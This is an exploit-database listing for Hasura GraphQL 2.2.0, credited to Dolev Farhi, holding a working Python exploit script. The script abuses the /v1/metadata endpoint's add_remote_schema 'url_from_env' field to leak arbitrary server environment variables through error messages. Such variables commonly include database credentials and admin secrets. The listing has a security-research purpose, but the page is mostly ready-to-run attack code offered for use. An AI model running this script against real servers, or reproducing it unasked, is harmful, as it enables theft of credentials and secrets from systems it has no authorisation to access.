Hasura GraphQL 2.2.0 Information Disclosure

2022.03.07
Credit: Dolev Farhi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure # Software: Hasura GraphQL Community # Software Link: https://github.com/hasura/graphql-engine # Version: 2.2.0 # Exploit Author: Dolev Farhi # Date: 5/05/2022 # Tested on: Ubuntu import requests SERVER_ADDR = 'x.x.x.x' url = 'http://{}/v1/metadata'.format(SERVER_ADDR) print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read') while True: env_var = input('Type environment variable key to leak.\n> ') if not env_var: continue payload = { "type": "bulk", "source": "", "args": [ { "type": "add_remote_schema", "args": { "name": "ttt", "definition": { "timeout_seconds": 60, "forward_client_headers": False, "headers": [], "url_from_env": env_var }, "comment": "" } } ], "resource_version": 2 } r = requests.post(url, json=payload) try: print(r.json()['error'].split('not a valid URI:')[1]) except IndexError: print('Could not parse out VAR, dumping error as is') print(r.json().get('error', 'N/A'))


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top